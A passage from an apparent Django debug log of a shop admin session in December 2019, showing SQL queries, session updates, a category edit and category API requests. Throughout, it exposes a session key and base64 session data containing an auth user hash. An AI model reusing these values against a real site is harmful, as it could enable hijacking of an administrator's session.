FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 08:44:04] "GET /jsi18n/ HTTP/1.0" 200 3223 [13/Dec/2019 08:44:04] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [13/Dec/2019 08:44:04] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [13/Dec/2019 08:44:04] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [13/Dec/2019 08:44:04] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [13/Dec/2019 08:44:06] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 DEBUG 2019-12-13 08:44:13,772 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:13.763900+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 13, 763900, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:13,775 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:44:13,777 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 08:44:13,786 utils 11259 139831317362432 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'category'); args=('shop', 'category') DEBUG 2019-12-13 08:44:13,835 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:44:13,879 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:44:13.877211+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 44, 13, 877211, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:44:13] "GET /shop/category/10/change/ HTTP/1.0" 200 8032 [13/Dec/2019 08:44:14] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 DEBUG 2019-12-13 08:44:14,215 utils 11259 139831538779904 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:14.206333+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 14, 206333, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:14,219 utils 11259 139831538779904 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 08:44:14] "GET /jsi18n/ HTTP/1.0" 200 3223 [13/Dec/2019 08:44:14] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [13/Dec/2019 08:44:14] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [13/Dec/2019 08:44:14] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 DEBUG 2019-12-13 08:44:17,972 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:17.959280+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 17, 959280, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:17,976 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:44:17,980 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 08:44:17,989 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."name" = 'BIRDS & INSECTS' AND NOT ("shop_category"."id" = 10)) LIMIT 1; args=('BIRDS & INSECTS', 10) DEBUG 2019-12-13 08:44:17,993 utils 11259 139831317362432 (0.003) UPDATE "shop_category" SET "name" = 'BIRDS & INSECTS', "parent_id" = NULL, "image" = 'categories/2019/12/07/collection10.png', "description" = '', "popular" = true, "slug" = 'birds-insects' WHERE "shop_category"."id" = 10; args=('BIRDS & INSECTS', 'categories/2019/12/07/collection10.png', '', True, 'birds-insects', 10) DEBUG 2019-12-13 08:44:17,997 utils 11259 139831317362432 (0.002) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T08:44:17.994667+00:00'::timestamptz, 6, 8, '10', 'BIRDS & INSECTS', 2, '[]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 8, 44, 17, 994667, tzinfo=), 6, 8, '10', 'BIRDS & INSECTS', 2, '[]') [13/Dec/2019 08:44:18] "POST /shop/category/10/change/ HTTP/1.0" 302 0 DEBUG 2019-12-13 08:44:18,298 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:18.283599+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 18, 283599, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:18,302 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:44:18,307 utils 11259 139831317362432 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 08:44:18,309 utils 11259 139831317362432 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 08:44:18,318 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 08:44:18,478 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:44:18.475671+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 44, 18, 475671, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:44:18] "GET /shop/category/ HTTP/1.0" 200 6950 DEBUG 2019-12-13 08:44:18,809 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:18.800027+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 18, 800027, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:18,812 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 08:44:18] "GET /jsi18n/ HTTP/1.0" 200 3223 [13/Dec/2019 08:44:19] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 200 436 DEBUG 2019-12-13 08:44:21,842 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:21.834128+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 21, 834128, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:21,845 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:44:21,893 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:44:21,938 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:44:21.936332+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 44, 21, 936332, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:44:21] "GET /shop/category/add/ HTTP/1.0" 200 7467 DEBUG 2019-12-13 08:44:22,264 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:22.255678+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 22, 255678, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:22,267 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 08:44:22] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 08:44:35,371 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:35.355032+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 35, 355032, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:35,375 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:44:35,380 utils 11259 139831317362432 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 08:44:35,382 utils 11259 139831317362432 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 08:44:35,390 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 08:44:35,552 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:44:35.548804+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 44, 35, 548804, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:44:35] "GET /shop/category/ HTTP/1.0" 200 6758 DEBUG 2019-12-13 08:44:35,888 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:35.877869+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 35, 877869, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:35,892 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 08:44:35] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 08:44:58,733 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:44:58,740 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:44:58,743 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:44:58,745 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:44:58,748 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:44:58,750 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:44:58,754 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:44:58,757 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:44:58,760 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:44:58,762 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:44:58,765 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:44:58] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:47:11,546 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:47:11,551 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:47:11,554 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:47:11,558 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:47:11,560 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:47:11,562 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:47:11,565 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:47:11,567 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:47:11,570 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:47:11,572 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:47:11,574 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:47:11] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:47:34,679 utils 11259 139831317362432 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:47:34.663479+00:00'::timestamptz AND "django_session"."session_key" = 